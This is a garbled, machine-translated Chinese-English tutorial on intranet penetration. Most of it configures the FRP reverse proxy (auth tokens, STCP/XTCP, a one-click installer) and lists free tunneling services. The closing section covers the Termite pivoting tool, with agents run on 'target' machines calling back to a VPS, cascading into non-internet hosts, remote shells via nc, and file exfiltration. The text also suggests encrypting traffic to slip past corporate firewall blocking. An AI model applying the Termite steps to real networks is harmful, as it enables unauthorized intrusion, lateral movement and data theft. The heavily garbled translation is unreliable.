$ vim frps.ini[common]# 指定 Dashboard 的监听的 IP 地址dashboard_addr = 0.0.0.0# 指定 Dashboard 的监听的端口dashboard_port = 7500# 指定访问 Dashboard 的用户名dashboard_user = admin# 指定访问 Dashboard 的端口dashboard_pwd = admin

Second reboot FRP 服务端:

$ ./frps -c ./frps.ini2018/01/25 16:39:29 [I] [service.go:96] frps tcp listen on 0.0.0.0:70002018/01/25 16:39:29 [I] [service.go:125] http service listen on 0.0.0.0:80802018/01/25 16:39:29 [I] [service.go:164] Dashboard listen on 0.0.0.0:75002018/01/25 16:39:29 [I] [main.go:112] Start frps success2018/01/25 16:39:29 [I] [main.go:114] PrivilegeMode is enabled, you should pay more attention to security issues

最后通过http://[server_addr]:7500访问 Dashboard 界面,用户名密码默认都为 admin.

给 FRP Add the authentication server

By default just knowFRP服务端开放的端口,任意FRPClients can register port mappings on the server at will,This is for the publicFRPObviously not too safe service.FRPProvides an authentication mechanism to improveFRP服务端的安全性.It’s also easy to enable this feature,只需在FRP服务端和FRP客户端的 common 配置中启用privilege_token参数就行.

[common]privilege_token = 12345678

After enabling this feature,只有FRP服务端和FRP客户端的 common 配置中的privilege_tokenParameter consistent authentication will pass,FRPclient can succeed inFRPServer registration port mapping.Otherwise, the registration will fail,出现类似下面的错误:

2018/01/25 17:29:27 [I] [proxy_manager.go:284] proxy removed: []2018/01/25 17:29:27 [I] [proxy_manager.go:294] proxy added: [ssh web dns unix_domain_socket]2018/01/25 17:29:27 [I] [proxy_manager.go:317] visitor removed: []2018/01/25 17:29:27 [I] [proxy_manager.go:326] visitor added: []2018/01/25 17:29:27 [E] [control.go:230] authorization failed2018/01/25 17:29:27 [W] [control.go:109] login to server failed: authorization failedauthorization failed

需要注意的是FRP客户端所在机器和FRPThe time difference of the machine where the server is located cannot exceed 15 分钟,Because the timestamp will be used for cryptographic verification,Prevent packets from being used by others after being hijacked.This timeout can be passed in the configuration fileauthentication_timeout这个参数来修改,单位为秒,默认值为 900,即 15 分钟.如果修改为 0,则FRPThe server will not perform timeout verification on the timestamp of the authentication packet.

FRP Client hot loading configuration file

当修改了FRP客户端中的配置文件,从 0.15 The version can start viafrpc reloadcommand to dynamically load configuration files,通常会在 10 Agent updates in seconds.

Enabling this feature requiresFRPEnabled in the client profile admin 端口,用于提供API服务.配置如下:

$ vim frpc.ini[common]admin_addr = 127.0.0.1admin_port = 7400

重启FRP客户端,Hot reloading can be done laterFRPClient configuration changed.

$ ./frpc -c ./frpc.ini2018/01/25 18:04:25 [I] [proxy_manager.go:326] visitor added: []2018/01/25 18:04:25 [I] [control.go:240] [3653b9a878f8acc7] login to server success, get run id [3653b9a878f8acc7], server udp port [0]2018/01/25 18:04:25 [I] [service.go:49] admin server listen on 127.0.0.1:74002018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [ssh] start proxy success2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [web] start proxy success2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [dns] start proxy success2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [unix_domain_socket] start proxy success$ ./frpc reload -c ./frpc.inireload success

After waiting for a while, the client will be created according to the new configuration file、更新、删除代理.

  • 需要注意的是 [common] parameters in addition to start can’t be edited at the moment.

启用admin_addr后,还可以通过frpc status -c ./frpc.ini命令在 FRP It is very convenient for the client to view the current proxy status information.

$ ./frpc status -c ./frpc.iniProxy Status...TCPName Status LocalAddr Plugin RemoteAddr Errorssh running 127.0.0.1:22 4.3.2.1:6000unix_domain_socket running unix_domain_socket 4.3.2.1:6002UDPName Status LocalAddr Plugin RemoteAddr Errordns running 8.8.8.8:53 4.3.2.1:6001HTTPName Status LocalAddr Plugin RemoteAddr Errorweb running 127.0.0.1:80 mike.hi-linux.com:8080

给 FRP Server add port whitelist

为了防止FRP端口被滥用,FRPProvides the ability to specify which ports are allowed to be assigned.可通过FRP服务端的配置文件中privilege_allow_ports参数来指定:

$ vim frps.ini[common]privilege_allow_ports = 2000-3000,3001,3003,4000-5000

privilege_allow_portsCan be configured to allow use of a specified port or a range of ports,以 , 分隔,The specified range starts with – 分隔.

When registering with a disallowed port,就会注册失败.An error similar to the following occurs:

$ ./frpc status -c ./frpc.iniProxy Status...TCPName Status LocalAddr Plugin RemoteAddr Errorssh start error 127.0.0.1:22 4.3.2.1:60000 port not allowedunix_domain_socket start error unix_domain_socket 4.3.2.1:60002 port not allowed

启用 TCP 多路复用

从 v0.10.0 版本开始,The connection between client and server supports multiplexing,No more need to create a connection for every user request,Lower latency for connection establishment,And to avoid a large number of file descriptors,使FRPCan handle higher concurrency.

该功能默认启用,To close it can beFRPserver configuration file andFRPThe client is configured in the configuration file,This configuration item must be the same on the server and client:

# frps.ini 和 frpc.ini 中[common]tcp_mux = false

FRP Low level communication enabled KCP 协议

FRP 从 v0.12.0 版本开始,Choice of underlying communication protocol supportKCP协议,In low transmission efficiency increases obviously under the network environment,But there will be some extra traffic consumption.

要开启KCP协议支持,首先要在FRPenabled in the server configuration fileKCP协议支持:

$ vim frps.ini[common]bind_port = 7000# 指定一个 UDP Port used to receive client requests KCP 绑定的是 UDP 端口,可以和 bind_port 一样kcp_bind_port = 7000

其次是在FRPThe client configuration file specifies the type of protocol that needs to be used,目前只支持TCPKCP.Other proxy configuration does not need to be changed:

$ vim frpc.ini[common]server_addr = 4.3.2.1# server_port 指定为 FRP in the server kcp_bind_port 指定的端口server_port = 7000# Specify the type of protocol to use,默认类型为 TCPprotocol = kcp
  • Need to pay attention to open the relevant machine UDP 端口的访问权限.

给 FRP Server configuration connection pool

默认情况下,When the user requests to establish a connection,FRPserver will requestFRPThe client actively establishes a connection with the backend service.

As for the specifiedFRPAfter the server enables the connection pool function,FRPIn advance and the back-end service within a specified number of connections,every time a user request is received,A connection will be taken from the connection pool and associated with the user connection,avoids waiting for a connection to be established with the backend service andFRP客户端 和FRPThe time for transferring control information between servers.

首先需要在FRPThe upper limit of the connection pool that each proxy can create is set in the server configuration file,避免大量资源占用,客户端设置超过此配置后会被调整到当前值:

$ vim frps.ini[common]max_pool_count = 5

其次在FRPConnection pooling is enabled for the client in the client configuration file,指定预创建连接的数量:

$ vim frpc.ini[common]pool_count = 1
  • This function is suitable for the open when there is a lot of short connection request.

加密与压缩

如果公司内网防火墙对外网访问进行了流量识别与屏蔽,例如禁止了SSH协议等,可通过设置 use_encryption = true,将FRP客户端 与FRPEncrypted transmission of communication content between servers,将会有效防止流量被拦截.

如果传输的报文长度较长,通过设置 use_compression = true 对传输内容进行压缩,可以有效减小FRP客户端 与FRPnetwork traffic between servers,To speed up the flow forward,但是会额外消耗一些 CPU 资源.

这两个功能默认是不开启的,需要在FRPEncryption and compression are enabled for the specified proxy by configuration in the client configuration file,压缩算法使用的是 snappy.

$ vim frpc.ini[ssh]type = tcplocal_port = 22remote_port = 6000use_encryption = trueuse_compression = true

通过 FRP The client proxy other intranet machines to access the extranet

FRPThe client built-inhttp_proxysocks5插件,Through these two plug-ins can make other network through the machineFPRThe client’s network access to the Internet.

要启用此功能,首先需要在FRPEnable related plugins in the client configuration file,这里以http_proxy插件为例:

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000[http_proxy]type = tcpremote_port = 6000plugin = http_proxy

Secondly, set the proxy address of the internal machine that needs to access the external network through this proxy to 4.3.2.1:6000,这样就可以通过 FRP The client machine’s network has access to the Internet.

  • http_proxyThe plugin also supports authentication mechanisms,If you need to enable authentication, you can pass the configuration parameterplugin_http_userplugin_http_passwd启用.

  • 如需启用Socks5代理,只需将 plugin 的值更换为 socks5 即可.

通过代理连接 FRP 服务端

在只能通过代理访问外网的环境内,FRPClient support viaHTTP_PROXYparameters to configure the proxy andFRP服务端进行通信.To use this function you can set the system environment variable byHTTP_PROXY或者通过在FRPset in the client’s configuration filehttp_proxy参数来使用此功能.

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000protocol = tcphttp_proxy = http://user:pwd@4.3.2.2:8080
  • 仅在protocol = tcp时生效,暂时不支持 kcp 协议.

安全地暴露内网服务

For some more sensitive services, if they are directly exposed to the public network, there will be security risks,FRPAlso provides a secure way of forwardingSTCP.使用STCP(secret tcp) This type of proxy can avoid allowing anyone to access intranet services that penetrate the public network,要使用STCPThe schema visitor needs to run another one separatelyFRP客户端.

Here is to create a only oneself to be able to accessSSH服务代理为例,FRPThe server and other deployment steps are the same,主要区别是在FRP客户端上.

首先配置FRP客户端,和常规TCPThe difference between forwarding is that there is no need to specify the remote port here..

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000[secret_ssh]type = stcp# 只有 sk 一致的用户才能访问到此服务sk = abcdefglocal_ip = 127.0.0.1local_port = 22

Second, start another one on the machine where you want to access the serviceFRP客户端,配置如下:

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000[secret_ssh_visitor]type = stcp# STCP 的访问者role = visitor# 要访问的 STCP 代理的名字,same as previously defined.server_name = secret_ssh# be consistent with the previous definitionsk = abcdefg# 绑定本地端口用于访问 ssh 服务bind_addr = 127.0.0.1bind_port = 6005

Finally start aFRP客户端,This allows the machine to 6005 port to intranet machineSSH服务进行访问,假设用户名为 mike:

$ ./frpc -c ./frpc.ini2018/01/26 15:03:24 [I] [proxy_manager.go:284] proxy removed: []2018/01/26 15:03:24 [I] [proxy_manager.go:294] proxy added: []2018/01/26 15:03:24 [I] [proxy_manager.go:317] visitor removed: []2018/01/26 15:03:24 [I] [proxy_manager.go:326] visitor added: [secret_ssh_visitor]2018/01/26 15:03:24 [I] [control.go:240] [60d2af2f68196537] login to server success, get run id [60d2af2f68196537], server udp port [0]2018/01/26 15:03:24 [I] [proxy_manager.go:235] [60d2af2f68196537] try to start visitor [secret_ssh_visitor]2018/01/26 15:03:24 [I] [proxy_manager.go:243] [secret_ssh_visitor] start visitor success$ ssh -oPort=6005 mike@127.0.0.1

点对点内网穿透

In a large amount of data transmission if have been servers,这样会对服务器端带宽压力比较大.FRP提供了一种新的代理类型XTCP来解决这个问题,XTCPTransmission mode can be found in a large amount of data to flow without servers.

使用方式同STCP类似,It needs to be deployed on both ends of the transmission dataFRP客户端上用于建立直接的连接.

首先在FRPAdd one to the server configurationUDP端口用于支持该类型的客户端:

$ vim frps.inibind_udp_port = 7001

其次配置FRP客户端,和常规TCPThe difference between forwarding is that there is no need to specify the remote port here..

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000[p2p_ssh]type = xtcp# 只有 sk 一致的用户才能访问到此服务sk = abcdefglocal_ip = 127.0.0.1local_port = 22

Then start another one on the machine where you want to access the serviceFRP客户端,配置如下:

$ vim frpc.ini[common]server_addr = 4.3.2.1server_port = 7000[p2p_ssh_visitor]type = xtcp# XTCP 的访问者role = visitor# 要访问的 XTCP 代理的名字server_name = p2p_sshsk = abcdefg# 绑定本地端口用于访问 ssh 服务bind_addr = 127.0.0.1bind_port = 6006

Finally start a FRP 客户端,This allows the machine to 6006 port to intranet machine SSH 服务进行访问,假设用户名为 mike:

$ ./frpc -c ./frpc.ini2018/01/26 16:01:52 [I] [proxy_manager.go:326] visitor added: [p2p_ssh_visitor secret_ssh_visitor]2018/01/26 16:01:52 [I] [control.go:240] [7c7e06878e11cc3c] login to server success, get run id [7c7e06878e11cc3c], server udp port [7001]2018/01/26 16:01:52 [I] [proxy_manager.go:235] [7c7e06878e11cc3c] try to start visitor [p2p_ssh_visitor]2018/01/26 16:01:52 [I] [proxy_manager.go:243] [p2p_ssh_visitor] start visitor success2018/01/26 16:01:52 [I] [proxy_manager.go:235] [7c7e06878e11cc3c] try to start visitor [secret_ssh_visitor]2018/01/26 16:01:52 [I] [proxy_manager.go:243] [secret_ssh_visitor] start visitor success$ ssh -oPort=6006 mike@127.0.0.1
  • 目前XTCPMode is still in the early stages of development,并不能穿透所有类型的NAT设备,所以穿透成功率较低.穿透失败时可以尝试STCP的方式.

FRP 管理

FRPThe deployment and installation are relatively simple,The project official did not provide the corresponding management script..Fortunately, open source projects always have netizens eager to provide deployment and management scripts.If you think manual deployment is too cumbersome,You can also use the one-click install script below.

项目地址:https://github.com/clangcn/onekey-install-shell/

下载一键部署脚本

$ wget --no-check-certificate https://raw.githubusercontent.com/clangcn/onekey-install-shell/master/frps/install-frps.sh -O ./install-frps.sh$ chmod 700 ./install-frps.sh

安装 FRP 服务端

This one-click deployment script is easier to use,In order to improve the speed of domestic users to download the installation package, the installation source of Alibaba Cloud node is also provided..The entire script and more simple to use,对一些常用的FRPThe server configuration parameters are all interactively selected so that users can easily choose according to their actual situation.Scripts is a bit more close to the default of public network address were tested,Saves the hassle of manual input.

$ ./install-frps.sh installPlease select frps download url:[1].aliyun (default)[2].githubEnter your choice (1, 2 or exit. default [aliyun]):---------------------------------------Your select: aliyun---------------------------------------Loading network version for frps, please wait...frps Latest release file frp_0.15.1_linux_amd64.tar.gzLoading You Server IP, please wait...You Server IP:12.34.56.78Please input your server setting:Please input frps bind_port [1-65535](Default Server Port: 5443):7000frps bind_port: 7000Please input frps vhost_http_port [1-65535](Default vhost_http_port: 80):8080frps vhost_http_port: 8080Please input frps vhost_https_port [1-65535](Default vhost_https_port: 443):frps vhost_https_port: 443Please input frps dashboard_port [1-65535](Default dashboard_port: 6443):7500frps dashboard_port: 7500Please input dashboard_user (Default: admin):frps dashboard_user: adminPlease input dashboard_pwd (Default: IY0p1bOg):adminfrps dashboard_pwd: adminPlease input privilege_token (Default: 9BqswPpd1R0TfGR5):mikefrps privilege_token: mikePlease input frps max_pool_count [1-200](Default max_pool_count: 50):frps max_pool_count: 50##### Please select log_level #####1: info (default)2: warn3: error4: debug#####################################################Enter your choice (1, 2, 3, 4 or exit. default [1]):log_level: infoPlease input frps log_max_days [1-30](Default log_max_days: 3 day):frps log_max_days: 3##### Please select log_file #####1: enable (default)2: disable#####################################################Enter your choice (1, 2 or exit. default [1]):log_file: enable##### Please select tcp_mux #####1: enable (default)2: disable#####################################################Enter your choice (1, 2 or exit. default [1]):tcp_mux: true##### Please select kcp support #####1: enable (default)2: disable#####################################################Enter your choice (1, 2 or exit. default [1]):kcp support: true============== Check your input ==============You Server IP : 12.34.56.78Bind port : 7000kcp support : truevhost http port : 8080vhost https port : 443Dashboard port : 7500Dashboard user : adminDashboard password : adminPrivilege token : miketcp_mux : trueMax Pool count : 50Log level : infoLog max days : 3Log file : enable==============================================Press any key to start...or Press Ctrl+c to cancelfrps install path:/usr/local/frpsconfig file for frps ... donedownload frps ... donedownload /etc/init.d/frps... donesetting frps boot... done+--------------------------------------------------+| Manager for Frps, Written by Clang |+--------------------------------------------------+| Intro: http://koolshare.cn/thread-65379-1-1.html |+--------------------------------------------------+Starting Frps(0.15.1)... doneFrps (pid 3325)is running.+---------------------------------------------------------+| frps for Linux Server, Written by Clang |+---------------------------------------------------------+| A tool to auto-compile & install frps on Linux |+---------------------------------------------------------+| Intro: http://koolshare.cn/thread-65379-1-1.html |+---------------------------------------------------------+Congratulations, frps install completed!==============================================You Server IP : 12.34.56.78Bind port : 7000KCP support : truevhost http port : 8080vhost https port : 443Dashboard port : 7500Privilege token : miketcp_mux : trueMax Pool count : 50Log level : infoLog max days : 3Log file : enable==============================================frps Dashboard : http://12.34.56.78:7500/Dashboard user : adminDashboard password : admin==============================================

配置 FRP 服务端

$ ./install-frps.sh config

更新 FRP 服务端

$ ./install-frps.sh update

卸载 FRP 服务端

$ ./install-frps.sh uninstall

FRP Server day-to-day management

FRPAfter the server is installed,One-click deployment scripts also provide a day-to-day managementFRPServer-side management scripts for daily startup、重启、停止等操作,非常的方便.

Usage: /etc/init.d/frps {start|stop|restart|status|config|version}

五种永久免费 内网穿透傻瓜式使用

:https://www.cnblogs.com/liyangit-bky/articles/13993007.html

free intranet penetration

From:https://zhuanlan.zhihu.com/p/339923535

不想付费,and want to use more than two mappings,then peanut shells + NATAPP 也许是一个不错的选择.

1、WeNAT

优点:

  • 无需付费
  • 无需注册
  • 不限流量
  • 开箱即用

官网:https://www.wezoz.com(目前暂时关闭,But does not affect intranet penetration.)

客户端下载:wenat-client.jar

使用方法:

  • 需要安装 Java 环境,可访问https://www.java.com/zh-CN/download进行下载安装.
  • 打开 WeNAT 客户端,输入域名,设置转发地址.
  • 点击启动服务即可.

2、花生壳

优点:

  • Give away a domain name
  • Free two maps
  • 每月免费 1G 流量

官网:https://hsk.oray.com

客户端下载:https://hsk.oray.com/download

使用方法:

  • 注册账号
  • Download and log in to the client
  • Create a new map and save

注意事项:

  • 如果使用 HTTP Mapping requires payment 6 元购买 HTTP 网站认证
  • Free accounts cannot be used HTTPS 映射
  • Free accounts for mapping of the bandwidth 1M

3、NATAPP

优点:

  • Up to two free tunnels
  • You can view the specific information of each request through the management background

缺点:

  • The client is not a graphical interface
  • 免费隧道会不定时强制更换域名

官网:https://natapp.cn/

客户端下载:https://natapp.cn/#

使用方法:

  • 进入「购买隧道」页面,购买免费隧道.

  • Enter the tunnel configuration,Set local address and port

  • 查看 authtoken

  • 在终端执行 ./natapp -authtoken=上面查看到的 authtoken,Then visit the circled link.

内网穿透利器 — Termite

​官网:https://rootkiter.com/Termite/ 官网说明:http://rootkiter.com/Termite/README.txt github:https://github.com/rootkiter/Binary-files​

下载地址:https://github.com/ph-cwtcwt/IT-tool/tree/termite

Termite It is an intranet penetration tool,分为管理端 admin and proxy agent.它支持多平台、Forward and reverse cascading between springboards、内置 shell 管理等.

Admin 功能参数

Agent 功能参数

Admin 连接 agent After the function parameters

The use of different scenarios

1、The target is on the public network

使用: (1)目标A:agent_win32.exe -l 8888 (2)PC:admin_win32.exe -c 目标ip -p 8888

2、target intranet(能出网)

使用: (1)在vps运行:agent_win32.exe -l 8888 (2)run on your own machine:admin_win32.exe -c vps_ip -p 8888 (3)run on the target machine:agent_win32.exe -c vps_ip -p 8888

3、目标B在内网(不出网,Internet access machineA)

(1)agent forward connection

使用: a.在 vps 运行:agent_win32.exe -l 8888 b.在 PC 运行:admin_win32.exe -c vps_ip -p 8888 c.On the network machine A 运行:agent_win32.exe -c vps_ip -p 8888 d.在目标 B运行:agent_win32.exe -l 9000 e.在 PC 运行:goto A_id → connect B_ip 9000

(2)agent reverse connection

说明: a.在vps运行:agent_win32.exe -l 8888 b.在PC运行:admin_win32.exe -c vps_ip -p 8888 c.On the network machineA运行:agent_win32.exe -c vps_ip -p 8888 d.在PC运行:goto A_id -> listen 9000 e.在目标B运行:agent_win32.exe -c A_ip -p 9000

常用功能

socks 代理

使用:

(1)goto 对应id (2)socks 1080

shell 管理

使用:

(1)shell 4444 (2)nc -v 127.0.0.1 4444

端口转发

使用:

lcxtran 本地端口 目标ip 目标端口

上传下载文件

使用:

upfile 本地文件路径 目标路径 downfile 目标文件路径 本地存放路径